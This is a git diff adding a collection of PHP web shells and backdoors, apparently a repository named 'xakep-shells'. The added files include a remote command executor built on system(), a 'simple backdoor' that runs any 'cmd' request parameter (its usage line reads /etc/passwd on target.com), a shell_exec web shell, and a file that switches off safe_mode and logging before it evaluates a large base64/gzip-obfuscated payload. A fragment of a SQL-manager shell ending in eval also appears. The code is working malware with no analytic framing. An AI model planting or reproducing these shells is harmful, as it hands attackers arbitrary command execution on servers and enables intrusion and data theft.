+mysql_query($aup,$connect) or $err=1;
+}
+print(isset($err)?mysql_error($connect):'Query susceful!');
+}
+
+
+
+
+
+
+break;
+
+case 10:
+//DELETE
+if(!isset($_POST['table_sel2']) || $_POST['table_sel']===$_POST['table_sel2']){
+$code='DELETE FROM `'.$_POST['table_sel'].'` WHERE '.urldecode($_POST['edit']).' LIMIT 1';
+isset($_POST['delp'])?mysql_query($code):print("<div style='width:100%;background-color:#A8B8F1;'>".htmlspecialchars($code).'<input type=hidden name=edit value="'.$_POST['edit'].'"><br><input type=submit name=delp value=OK></div>');
+}
+else select();
+
+
+break;
+
+
+
+
+
+
+
+}}
+
+
+
+echo "</td></tr></table></td></tr></table></tr><table><input type=hidden name=sql value=1>\n";
+
+}
+
+else eval($text.";echo \$etext;");
+echo "</form></body></html>";
+exit;
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/shell.php.php.txt b/xakep-shells/PHP/shell.php.php.txt
new file mode 100644
index 0000000..ef13ce8
--- /dev/null
+++ b/xakep-shells/PHP/shell.php.php.txt
@@ -0,0 +1,146 @@
+<?php
+
+define('PHPSHELL_VERSION', '1.7');
+
+?>
+
+<html>
+<head>
+<title> Matamu Mat </title>
+</head>
+<body>
+<hr><br>
+
+<?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+
+</body>
+</html>
diff --git a/xakep-shells/PHP/simple-backdoor.php.txt b/xakep-shells/PHP/simple-backdoor.php.txt
new file mode 100644
index 0000000..bc0e778
--- /dev/null
+++ b/xakep-shells/PHP/simple-backdoor.php.txt
@@ -0,0 +1,17 @@
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/PHP/simple_cmd.html.txt b/xakep-shells/PHP/simple_cmd.html.txt
new file mode 100644
index 0000000..6416588
--- /dev/null
+++ b/xakep-shells/PHP/simple_cmd.html.txt
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title>G-Security Webshell</title>
+</head>
+
+<body bgcolor=#000000 text=#ffffff ">
+<form method=POST>
+<br>
+<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" 
+style="background:#000000;color:#ffffff;">
+<hr>
+<pre>
+<? $cmd = $_REQUEST["-cmd"];?>
+<? if($cmd != "") print Shell_Exec($cmd);?>
+</pre>
+</form>
+</body>
+</html
diff --git a/xakep-shells/PHP/small.php.php.txt b/xakep-shells/PHP/small.php.php.txt
new file mode 100644
index 0000000..249ec2e
--- /dev/null
+++ b/xakep-shells/PHP/small.php.php.txt
@@ -0,0 +1,23 @@
+<? 
+error_reporting(0);
+
+$language='ru';
+
+$auth = 0;
+
+$name='abcdef1234567890abcdef1234567890'; 
+$pass='abcdef1234567890abcdef1234567890';
+
+@ini_restore("safe_mode");
+@ini_restore("open_basedir");
+@ini_restore("safe_mode_include_dir");
+@ini_restore("safe_mode_exec_dir");
+@ini_restore("disable_functions");
+@ini_restore("allow_url_fopen");
+
+@ini_set('error_log',NULL);
+@ini_set('log_errors',0);
+
+/******************************************************************************************************/
+eval(gzinflate(base64_decode('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